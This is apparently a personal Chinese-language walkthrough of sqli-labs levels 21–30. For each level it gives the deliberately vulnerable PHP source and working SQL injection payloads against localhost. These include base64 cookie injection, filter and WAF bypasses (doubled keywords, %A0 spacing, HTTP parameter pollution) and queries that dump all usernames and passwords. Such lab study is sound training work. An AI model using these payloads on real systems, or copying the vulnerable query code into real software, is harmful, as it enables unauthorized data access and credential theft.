SQLI-LAB 的 实战记录(Less 21 - Less 30)
以下内容 只是 本人 在做 sqli-lab 练习时 写下的记录,仅供参考。 因为本人学过一些sql注入的内容,所以大部分内容是没有讲解的,如有不清楚的地方,请自行使用搜索引擎查询,相信会得到所需的内容。
Less - 21 Cookie Injection- Error Based- complex - string
(第21节:cookie注入 – 基于错误 – 复杂 - 字符串)
Test:
http://localhost/sqli-lab/Less-21/index.php
uname=Dumb&passwd=Dumb&submit=Submit
YOUR COOKIE : uname = RHVtYg== and expires: Sat 16 Jul 2016 - 08:32:26 注: RHVtYg== 是 Dumb 经Base64加密后的值(密文后两位或一位 等于号 的 就可以考虑 Base64) Base64编码/解码器 在线解码
RHVtYlw=
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''Dumb\') LIMIT 0,1' at line 1 注: RHVtYlw= 是cookie中uname的值,明文 Dumb\ 可以断定uname是有 一层单引号和一层括号 包裹
Sourse Code:
无cookie时 登录部分
$uname = check_input($_POST['uname']);
$passwd = check_input($_POST['passwd']);
$sql="SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
$result1 = mysql_query($sql);
$row1 = mysql_fetch_array($result1);
if($row1){
setcookie('uname', base64_encode($row1['username']), time()+3600);
print_r(mysql_error());
echo '<img src="../images/flag.jpg" />';
}else{
print_r(mysql_error());
echo '<img src="../images/slap.jpg" />';
}
有cookie时 登录部分:
$cookee = $_COOKIE['uname'];
$format = 'D d M Y - H:i:s';
$timestamp = time() + 3600;
echo "YOUR USER AGENT IS : ".$_SERVER['HTTP_USER_AGENT'];
echo "YOUR IP ADDRESS IS : ".$_SERVER['REMOTE_ADDR'];
echo "YOUR COOKIE : uname = $cookee and expires: " . date($format, $timestamp);
$cookee = base64_decode($cookee);
$sql="SELECT * FROM users WHERE username=('$cookee') LIMIT 0,1";
$result=mysql_query($sql);
if (!$result) {
die('Issue with your mysql: ' . mysql_error());
}
$row = mysql_fetch_array($result);
if($row) {
echo 'Your Login name:'. $row['username'];
echo 'Your Password:' .$row['password'];
echo 'Your ID:' .$row['id'];
} else{
echo '<img src="../images/slap1.jpg" />';
}
Solution:
') or 1=1 #
Jykgb3IgMT0xICM=
其它:
JykgdW5pb24gc2VsZWN0IDEsZGF0YWJhc2UoKSw2IG9yIDE9MSAj
明文 ') union select 1,database(),6 or 1=1 #
JykgdW5pb24gc2VsZWN0IDEsZ3JvdXBfY29uY2F0KHRhYmxlX25hbWUpLDMgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIHdoZXJlIHRhYmxlX3NjaGVtYT0nc2VjdXJpdHknICM=
明文 ') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' #
JykgdW5pb24gc2VsZWN0IDEsZ3JvdXBfY29uY2F0KHVzZXJuYW1lKSxncm91cF9jb25jYXQocGFzc3dvcmQpIGZyb20gc2VjdXJpdHkudXNlcnMgICM=
明文 ') union select 1,group_concat(username),group_concat(password) from security.users #
注:以上均为cookie中uname的值
Less - 22 Cookie Injection- Error Based- Double Quotes - string
(第22节:cookie注入 – 基于错误 – 双引号 - 字符串)
Test:
http://localhost/sqli-lab/Less-21/index.php
uname=Dumb&passwd=Dumb&submit=Submit
RHVtYlw=
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"Dumb\" LIMIT 0,1' at line 1 注: RHVtYlw= 是cookie中uname的值,明文 Dumb\ 可以断定uname是有 一层双引号 包裹
Sourse Code:
无cookie登录时:
$uname = check_input($_POST['uname']);
$passwd = check_input($_POST['passwd']);
$sql="SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
$result1 = mysql_query($sql);
$row1 = mysql_fetch_array($result1);
if($row1) {
setcookie('uname', base64_encode($row1['username']), time()+3600);
print_r(mysql_error());
echo '<img src="../images/flag.jpg" />';
}else{
print_r(mysql_error());
echo '<img src="../images/slap.jpg" />';
}
有cookie登录时:
$cookee = $_COOKIE['uname'];
$format = 'D d M Y - H:i:s';
$timestamp = time() + 3600;
echo "YOUR USER AGENT IS : ".$_SERVER['HTTP_USER_AGENT'];
echo "YOUR IP ADDRESS IS : ".$_SERVER['REMOTE_ADDR'];
echo "YOUR COOKIE : uname = $cookee and expires: " . date($format, $timestamp);
$cookee = base64_decode($cookee);
$cookee1 = '"'. $cookee. '"';
$sql="SELECT * FROM users WHERE username=$cookee1 LIMIT 0,1";
$result=mysql_query($sql);
if (!$result) {
die('Issue with your mysql: ' . mysql_error());
}
$row = mysql_fetch_array($result);
if($row) {
echo 'Your Login name:'. $row['username'];
echo 'Your Password:' .$row['password'];
echo 'Your ID:' .$row['id'];
} else{
echo '<img src="../images/slap1.jpg" />';
}
Solution:
IiBvciAxPTEgIw==
明文 " or 1=1 #
其它:
IiB1bmlvbiBzZWxlY3QgMSxkYXRhYmFzZSgpLDYgb3IgMT0xICM=
明文 " union select 1,database(),6 or 1=1 #
IiB1bmlvbiBzZWxlY3QgMSxncm91cF9jb25jYXQodGFibGVfbmFtZSksMyBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgd2hlcmUgdGFibGVfc2NoZW1hPSdzZWN1cml0eScgIw==
明文 " union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' #
IiB1bmlvbiBzZWxlY3QgMSxncm91cF9jb25jYXQodXNlcm5hbWUpLGdyb3VwX2NvbmNhdChwYXNzd29yZCkgZnJvbSBzZWN1cml0eS51c2VycyAgIw==
明文 " union select 1,group_concat(username),group_concat(password) from security.users #
注:以上均为cookie中uname的值
Less - 23 Error Based- no comments
(第23节: 基于错误 – 无评论)
Test:
http://localhost/sqli-lab/Less-23/index.php?id=2'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''2'' LIMIT 0,1' at line 1 注:能推断出 $id 周围是单引号
Sourse Code:
//filter the comments out so as to comments should not work
$reg = "/#/";
$reg1 = "/--/";
$replace = "";
$id = preg_replace($reg, $replace, $id);
$id = preg_replace($reg1, $replace, $id);
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
echo 'Your Login name:'. $row['username'];
echo 'Your Password:' .$row['password'];
}else{
print_r(mysql_error());
}
Solution:
' or '1' = '
http://localhost/sqli-lab/Less-23/index.php?id=' or '1' = '
其它:
http://localhost/sqli-lab/Less-23/index.php?id=' union select 1,version(),3 or '1' = '
http://localhost/sqli-lab/Less-23/index.php?id=' union select 1,group_concat(username),group_concat(password) from users where 1 or '1' = '
Less - 24 Second Degree Injections
(第24节:二次注入)
Test:
http://localhost/sqli-lab/Less-24/index.php
username=wolf password=1111
注:因为sqli-lab出的时间比较早,所用的php版本也比较早(可能是5.2),其中用到的一些函数已被废除,所以需要修改成类似的。
Sourse Code:
login_create.php
$link = mysqli_connect('localhost', 'root', '', 'security');
$username= mysqli_real_escape_string($link,$_POST['username']) ;
$pass= mysqli_real_escape_string($link,$_POST['password']);
$re_pass= mysqli_real_escape_string($link,$_POST['re_password']);
$sql = "insert into users (username, password) values(\"$username\", \"$pass\")";
login.php
$link = mysqli_connect('localhost', 'root', '', 'security');
$username = mysqli_real_escape_string($link,$_POST["login_user"]);
$password = mysqli_real_escape_string($link,$_POST["login_password"]);
$sql = "SELECT * FROM users WHERE username='$username' and password='$password'";
Solution:
username=admin" # password=1111
重置密码 改 1111 到 任意(比如666)
username=admin password=666 即可
Less - 25 Trick with OR & AND
(第25节:用 OR 和 AND 欺骗)
Test:
http://localhost/sqli-lab/Less-25/index.php?id=1' #
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' LIMIT 0,1' at line 1 注:id周围是单引号
http://localhost/sqli-lab/Less-25/index.php?id=1' --+
注:无报错
Sourse Code:
function blacklist($id){
$id= preg_replace('/or/i',"", $id);
$id= preg_replace('/AND/i',"", $id);
return $id;
}
$id= blacklist($id);
$hint=$id;
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row) {
echo 'Your Login name:'. $row['username'];
echo 'Your Password:' .$row['password'];
} else{
print_r(mysql_error());
}
注:and和or会被过滤,有报错,$id被单引号包围
Solution:
http://localhost/sqli-lab/Less-25/index.php?id=0' oorr 1=1 --+
http://localhost/sqli-lab/Less-25/index.php?id=2' aandnd 1=1 --+
其它:
http://localhost/sqli-lab/Less-25/index.php?id=0' union select 1,version(),database()--+
http://localhost/sqli-lab/Less-25/index.php?id=0' union select 1,group_concat(table_name),3 from infoorrmation_schema.tables where table_schema='security' --+
http://localhost/sqli-lab/Less-25/index.php?id=0' union select 1,group_concat(username),group_concat(passwoorrd) from security.users --+
注:过滤了and和or,但只有一次,所以多重复就好
Less - 25a Trick with OR & AND Blind
(第25节a:用 OR 和 AND 欺骗 与盲注)
Test:
http://localhost/sqli-lab/Less-25a/index.php?id=1
http://localhost/sqli-lab/Less-25a/index.php?id=2'
http://localhost/sqli-lab/Less-25a/index.php?id=2"
http://localhost/sqli-lab/Less-25a/index.php?id=2 oorr 1=1 #
注:id 周围没有符号 有 or 和 and 过滤
Sourse Code:
function blacklist($id){
$id= preg_replace('/or/i',"", $id);
$id= preg_replace('/AND/i',"", $id);
return $id;
}
$id= blacklist($id);
$hint=$id;
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row) {
echo 'Your Login name:'. $row['username'];
echo 'Your Password:' .$row['password'];
} else{
}
注:and和or会被过滤,无报错
Solution:
http://localhost/sqli-lab/Less-25a/index.php?id=0 oorr 1=1 --+
http://localhost/sqli-lab/Less-25a/index.php?id=2 aandnd 1=1 --+
其它:
http://localhost/sqli-lab/Less-25a/index.php?id=0 union select 1,version(),database() --+
http://localhost/sqli-lab/Less-25a/index.php?id=0 union select 1,group_concat(table_name),3 from infoorrmation_schema.tables where table_schema='security' --+
http://localhost/sqli-lab/Less-25a/index.php?id=0 union select 1,group_concat(username),group_concat(passwoorrd) from security.users --+
Less - 26 Trick with comments
(第26节:用 评论 欺骗)
Test:
http://localhost/sqli-lab/Less-26/index.php?id=0'")And AND and or OR select union /// #--/*+
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '")selectunion' LIMIT 0,1' at line 1 注:id周围只有单引号,过滤得只剩")selectunion
Sourse Code:
function blacklist($id) {
$id= preg_replace('/or/i',"", $id); //strip out OR (non case sensitive)
$id= preg_replace('/and/i',"", $id); //Strip out AND (non case sensitive)
$id= preg_replace('/[\/\*]/',"", $id); //strip out /*
$id= preg_replace('/[--]/',"", $id); //Strip out --
$id= preg_replace('/[#]/',"", $id); //Strip out #
$id= preg_replace('/[\s]/',"", $id); //Strip out spaces
$id= preg_replace('/[\/\\\\]/',"", $id); //Strip out slashes
return $id;
}
$id= blacklist($id);
$hint=$id;
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row) {
echo 'Your Login name:'. $row['username'];
echo 'Your Password:' .$row['password'];
}else{
print_r(mysql_error());
}
注:$id 周围是单引号,过滤了 or,and , /* , -- , # , 空格 , /
Solution:
http://localhost/sqli-lab/Less-26/index.php?id=1'%26%26'1
其它:
http://localhost/sqli-lab/Less-26/index.php?id=0'%A0UNION%A0SELECT%A01,version(),database()%26%26%a0'1
http://localhost/sqli-lab/Less-26/index.php?id=0'%A0union%A0select%A01,group_concat(table_name),3%A0from%A0infoorrmation_schema.tables%A0where%A0table_schema='security'%26%26%a0'1
http://localhost/sqli-lab/Less-26/index.php?id=0'%A0union%A0select%A01,group_concat(username),group_concat(passwoorrd)%A0from%A0security%2Eusers%A0where%A01%A0%26%26%a0'1
注:用%A0替代空格使用,用&&(%26%26)替代AND使用
Less - 26a Trick with comments
(第26a节:用 评论 欺骗)
Test:
http://localhost/sqli-lab/Less-26a/index.php?id=1')")And AND and or OR select union /// #--/*+
注:被过滤得只剩')")selectunion 无sql查询报错
http://localhost/sqli-lab/Less-26a/index.php?id=1'%A0%26%26%A0 '1'='1
http://localhost/sqli-lab/Less-26a/index.php?id=1"%A0%26%26%A0 "1"="1
http://localhost/sqli-lab/Less-26a/index.php?id=1")%A0%26%26%A0 ("1")=("1
注:都不报错,不知道格式是什么
http://localhost/sqli-lab/Less-26a/index.php?id=0'%A0UNION%A0SELECT%A01,2,3%A0%26%26%A0'1
注:都有php的报错,可能格式错了,查询不到
http://localhost/sqli-lab/Less-26a/index.php?id=0')%A0UNION%A0SELECT%A01,2,3%A0%26%26%A0('1
注:这次对了
Sourse Code:
function blacklist($id){
$id= preg_replace('/or/i',"", $id); //strip out OR (non case sensitive)
$id= preg_replace('/and/i',"", $id); //Strip out AND (non case sensitive)
$id= preg_replace('/[\/\*]/',"", $id); //strip out /*
$id= preg_replace('/[--]/',"", $id); //Strip out --
$id= preg_replace('/[#]/',"", $id); //Strip out #
$id= preg_replace('/[\s]/',"", $id); //Strip out spaces
$id= preg_replace('/[\s]/',"", $id); //Strip out spaces
$id= preg_replace('/[\/\\\\]/',"", $id); //Strip out slashes
return $id;
}
$id= blacklist($id);
$hint=$id;
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row) {
echo 'Your Login name:'. $row['username'];
echo 'Your Password:' .$row['password'];
} else{
}
注:$id 周围是单引号和括号,过滤了 or,and , /* , -- , # , 空格 , /
Solution:
http://localhost/sqli-lab/Less-26a/index.php?id=1')%A0UNION%A0SELECT%A01,2,3%A0%26%26%A0('1
其它:
http://localhost/sqli-lab/Less-26a/index.php?id=0')%A0UNION%A0SELECT%A01,version(),database()%26%26%a0('1
http://localhost/sqli-lab/Less-26a/index.php?id=0')%A0union%A0select%A01,group_concat(table_name),3%A0from%A0infoorrmation_schema.tables%A0where%A0table_schema='security'%26%26%a0('1
http://localhost/sqli-lab/Less-26a/index.php?id=0')%A0union%A0select%A01,group_concat(username),group_concat(passwoorrd)%A0from%A0security%2Eusers%A0where%A01%A0%26%26%a0('1
Less - 27 Trick with SELECT & UNION
(第27节:用 UNION 和 SELECT 欺骗)
Test:
http://localhost/sqli-lab/Less-27/index.php?id=0'")And AND and or OR Or or Select SELECT select UNION union Union Union /// #--?/*+
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '")AndANDandorOROror' LIMIT 0,1' at line 1 注:Id的周围是单引号,会过滤union和select及有注释作用的符号
Sourse Code:
function blacklist($id){
$id= preg_replace('/[\/\*]/',"", $id); //strip out /*
$id= preg_replace('/[--]/',"", $id); //Strip out --.
$id= preg_replace('/[#]/',"", $id); //Strip out #.
$id= preg_replace('/[ +]/',"", $id); //Strip out spaces.
$id= preg_replace('/select/m',"", $id); //Strip out spaces.
$id= preg_replace('/[ +]/',"", $id); //Strip out spaces.
$id= preg_replace('/union/s',"", $id); //Strip out union
$id= preg_replace('/select/s',"", $id); //Strip out select
$id= preg_replace('/UNION/s',"", $id); //Strip out UNION
$id= preg_replace('/SELECT/s',"", $id); //Strip out SELECT
$id= preg_replace('/Union/s',"", $id); //Strip out Union
$id= preg_replace('/Select/s',"", $id); //Strip out select
return $id;
}
$id= blacklist($id);
$hint=$id;
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row) {
echo 'Your Login name:'. $row['username'];
echo 'Your Password:' .$row['password'];
} else{
print_r(mysql_error());
}
Solution:
http://localhost/sqli-lab/Less-27/index.php?id=0'%A0or(1)=(1)%26%26%a0'1
其它:
http://localhost/sqli-lab/Less-27/index.php?id=0'%A0UnIoN%A0SeLeCt(1),version(),database()%26%26%a0'1
http://localhost/sqli-lab/Less-27/index.php?id=0'%A0UnIoN%A0SeLeCt(1),group_concat(table_name),3%A0from%A0information_schema.tables%A0where%A0table_schema='security'%26%26%a0'1
http://localhost/sqli-lab/Less-27/index.php?id=0'%A0UnIoN%A0SeLeCt(1),group_concat(username),group_concat(password)%A0from%A0security%2Eusers%A0where%A01%26%26%a0'1
Less - 27a Trick with SELECT & UNION
(第27a节:用 UNION 和 SELECT 欺骗)
Test:
http://localhost/sqli-lab/Less-27a/index.php?id=0'")And AND and or OR Or or Select SELECT select UNION union Union Union /// #--?/*+
注:无sql查询报错,过滤后还剩 0'")AndANDandorOROror
Sourse Code:
function blacklist($id){
$id= preg_replace('/[\/\*]/',"", $id); //strip out /*
$id= preg_replace('/[--]/',"", $id); //Strip out --.
$id= preg_replace('/[#]/',"", $id); //Strip out #.
$id= preg_replace('/[ +]/',"", $id); //Strip out spaces.
$id= preg_replace('/select/m',"", $id); //Strip out spaces.
$id= preg_replace('/[ +]/',"", $id); //Strip out spaces.
$id= preg_replace('/union/s',"", $id); //Strip out union
$id= preg_replace('/select/s',"", $id); //Strip out select
$id= preg_replace('/UNION/s',"", $id); //Strip out UNION
$id= preg_replace('/SELECT/s',"", $id); //Strip out SELECT
$id= preg_replace('/Union/s',"", $id); //Strip out Union
$id= preg_replace('/Select/s',"", $id); //Strip out Select
return $id;
}
$id= blacklist($id);
$hint=$id;
$id = '"' .$id. '"';
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row) {
echo 'Your Login name:'. $row['username'];
echo 'Your Password:' .$row['password'];
} else{
}
Solution:
http://localhost/sqli-lab/Less-27a/index.php?id=0"%A0or(1)=(1)%26%26%a0"1
其它:
http://localhost/sqli-lab/Less-27a/index.php?id=0"%A0UnIoN%A0SeLeCt(1),version(),database()%26%26%a0"1
http://localhost/sqli-lab/Less-27a/index.php?id=0"%A0UnIoN%A0SeLeCt(1),group_concat(table_name),3%A0from%A0information_schema.tables%A0where%A0table_schema='security'%26%26%a0"1
http://localhost/sqli-lab/Less-27a/index.php?id=0"%A0UnIoN%A0SeLeCt(1),group_concat(username),group_concat(password)%A0from%A0security%2Eusers%A0where%A01%26%26%a0"1
Less - 28 Trick with SELECT & UNION
(第28节:用 UNION 和 SELECT 欺骗 )
Test:
http://localhost/sqli-lab/Less-28/index.php?id=0'")And AND and or OR Or or UNION union Union Select SELECT select /// #--?/*+
注: 过滤了union空格select 这种组合与全部空格,无sql查询报错
http://localhost/sqli-lab/Less-28/index.php?id=0')%A0UnIon%A0SeLect
注:UnIon%A0SeLect 中间不是空格了,没被过滤
http://localhost/sqli-lab/Less-28/index.php?id=0'%A0UnIon%A0SeLect(1),2,3%A0%26%26%A0'
注:有php报错
http://localhost/sqli-lab/Less-28/index.php?id=0')%A0UnIon%A0SeLect(1),2,3%A0%26%26%A0('
注:这个对了,说明id周围是单引号和括号
Sourse Code:
function blacklist($id){
$id= preg_replace('/[\/\*]/',"", $id); //strip out /*
$id= preg_replace('/[--]/',"", $id); //Strip out --.
$id= preg_replace('/[#]/',"", $id); //Strip out #.
$id= preg_replace('/[ +]/',"", $id); //Strip out spaces.
$id= preg_replace('/[ +]/',"", $id); //Strip out spaces.
$id= preg_replace('/union\s+select/i',"", $id); //Strip out UNION & SELECT.
return $id;
}
$id= blacklist($id);
$hint=$id;
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
echo 'Your Login name:'. $row['username'];
echo 'Your Password:' .$row['password'];
}else{
}
Solution:
http://localhost/sqli-lab/Less-28/index.php?id=0')%A0UnIon%A0SeLect(1),2,3%A0%26%26%A0('
其它:
http://localhost/sqli-lab/Less-28/index.php?id=0')%A0UnIoN%A0SeLeCt(1),version(),database()%26%26%a0('1
http://localhost/sqli-lab/Less-28/index.php?id=0')%A0UnIoN%A0SeLeCt(1),group_concat(table_name),3%A0from%A0information_schema.tables%A0where%A0table_schema='security'%26%26%a0('1
http://localhost/sqli-lab/Less-28/index.php?id=0')%A0UnIoN%A0SeLeCt(1),group_concat(username),group_concat(password)%A0from%A0security%2Eusers%A0where%A01%26%26%a0('1
Less - 28a Trick with SELECT & UNION
(第28节a:用 UNION 和 SELECT 欺骗 )
Test:
http://localhost/sqli-lab/Less-28a/index.php?id=0'")And AND and or OR Or or UNION union Union Select SELECT select /// #--?/*+
注: 过滤了union空格select 这种组合,无sql查询报错
http://localhost/sqli-lab/Less-28a/index.php?id=1') --
注: 正常显示,没过滤空格和有注释作用的符号
Sourse Code:
function blacklist($id){
$id= preg_replace('/union\s+select/i',"", $id);
return $id;
}
$id= blacklist($id);
$hint=$id;
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row) {
echo 'Your Login name:'. $row['username'];
echo 'Your Password:' .$row['password'];
} else{
}
Solution:
http://localhost/sqli-lab/Less-28a/index.php?id=0') UnIon%A0SeLect 1,2,3--+
其它:
http://localhost/sqli-lab/Less-28a/index.php?id=0') UnIon%A0SeLect 1,version(),database()--+
http://localhost/sqli-lab/Less-28a/index.php?id=0') UnIon%A0SeLect 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+
http://localhost/sqli-lab/Less-28a/index.php?id=0') UnIon%A0SeLect 1,group_concat(username),group_concat(password) from security.users where 1--+
Less - 29 Protection with WAF
(第29节:用WAF防护)
Test:
http://localhost/sqli-lab/Less-29/login.php?id=0' union select 1,2,3 --+
注:被检测到有问题,跳转到其他的页面了
Sourse Code:
login.php
//WAF implimentation with a whitelist approach..... only allows input to be Numeric.
function whitelist($input) {
$match = preg_match("/^\d+$/", $input);
if($match) {
}else {
header('Location: hacked.php');
}
}
// The function below immitates the behavior of parameters when subject to HPP (HTTP Parameter Pollution).
function java_implimentation($query_string) {
$q_s = $query_string;
$qs_array= explode("&",$q_s);
foreach($qs_array as $key => $value) {
$val=substr($value,0,2);
if($val=="id") {
$id_value=substr($value,3,30);
return $id_value;
echo "<br>";
break;
}
}
}
$qs = $_SERVER['QUERY_STRING'];
$hint=$qs;
$id1=java_implimentation($qs);
$id=$_GET['id'];
whitelist($id1);
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row) {
echo 'Your Login name:'. $row['username'];
echo 'Your Password:' .$row['password'];
} else{
print_r(mysql_error());
}
Solution:
http://localhost/sqli-lab/Less-29/login.php?id=1&id=' union select 1,2,3 --+
其它:
http://localhost/sqli-lab/Less-29/login.php?id=1&id=' union select 1,version(),database() --+
http://localhost/sqli-lab/Less-29/login.php?id=1&id=' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+
http://localhost/sqli-lab/Less-29/login.php?id=1&id=' union select 1,group_concat(username),group_concat(password) from security.users where 1 --+
Less - 30 Protection with WAF
(第30节:用WAF防护)
Test:
http://localhost/sqli-lab/Less-30/login.php?id=1&id=6
注:显示的是id为6的内容
Sourse Code:
$qs = $_SERVER['QUERY_STRING'];
$hint=$qs;
$id1=java_implimentation($qs);
$id=$_GET['id'];
whitelist($id1);
$id = '"' .$id. '"';
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row) {
echo 'Your Login name:'. $row['username'];
echo 'Your Password:' .$row['password'];
} else{
print_r(mysql_error());
}
//WAF implimentation with a whitelist approach..... only allows input to be Numeric.
function whitelist($input) {
$match = preg_match("/^\d+$/", $input);
if($match) {
} else {
header('Location: hacked.php');
}
}
// The function below immitates the behavior of parameters when subject to HPP (HTTP Parameter Pollution).
function java_implimentation($query_string) {
$q_s = $query_string;
$qs_array= explode("&",$q_s);
foreach($qs_array as $key => $value) {
$val=substr($value,0,2);
if($val=="id") {
$id_value=substr($value,3,30);
return $id_value;
break;
}
}
}
Solution:
http://localhost/sqli-lab/Less-30/login.php?id=1&id=" union select 1,2,3 --+
其它:
http://localhost/sqli-lab/Less-30/login.php?id=1&id=" union select 1,version(),database() --+
http://localhost/sqli-lab/Less-30/login.php?id=1&id=" union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+
http://localhost/sqli-lab/Less-30/login.php?id=1&id=" union select 1,group_concat(username),group_concat(password) from security.users where 1 --+